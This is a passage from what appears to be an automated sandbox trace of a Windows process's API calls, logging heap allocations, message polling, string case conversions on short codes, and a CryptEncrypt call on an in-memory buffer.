0x24a9fc0 [0259.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1229a) returned 0x24b7a48 [0259.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0259.888] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0259.888] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0259.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0259.888] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0259.889] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0259.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0259.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0259.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0259.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0259.889] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0259.889] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.889] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0259.889] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0259.890] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0259.890] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0259.890] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0259.890] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0259.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0259.890] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0259.890] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0259.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0259.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0259.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0259.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0259.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0259.891] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0259.891] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.891] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0259.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0259.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0259.891] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0259.891] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0259.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0259.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0259.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0259.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0259.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0259.892] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0259.892] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.892] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0259.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0259.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0259.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0259.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0259.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0259.900] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.900] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0259.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0259.900] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0259.900] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0259.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0259.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0259.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0259.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0259.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0259.901] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0259.901] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.901] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0259.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0259.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0259.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0259.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0259.901] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.901] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0259.901] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0259.901] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.901] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.901] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.901] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.902] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.902] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.902] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.902] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.903] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x1229a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x122a0) returned 1 [0259.904] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.904] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.904] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.904] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.904] CharLowerBuffW (in: lpsz="byte[74400]", cchLength=0xb | out: lpsz="byte[74400]") returned 0xb [0259.904] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.906] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.906] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.907] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.907] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.907] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.907] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.907] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x1229a, dwBufLen=0x122a0 | out: pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x122a0) returned 1 [0259.908] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.908] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.909] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.909] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.910] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.910] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.910] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.910] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0259.910] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.910] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0259.910] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.910] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.910] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0259.910] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.910] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0259.911] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.911] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.911] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.911] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.911] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0259.911] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.911] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0259.911] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.911] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.911] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.911] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.911] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.918] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.918] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.918] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.922] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.923] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0259.923] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.923] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0259.923] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.923] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.923] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.923] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0259.923] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.923] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0259.924] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0259.924] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.924] CryptDestroyKey (hKey=0xaa5960) returned 1 [0259.924] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.924] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.924] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0259.926] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.926] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0259.926] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.926] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.926] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0259.926] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0259.926] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0259.926] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0259.926] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0259.926] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0259.926] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.927] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0259.927] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0259.927] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0259.927] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0259.927] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0259.927] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.927] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.927] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.927] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.927] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.927] CharUpperBuffW (in: 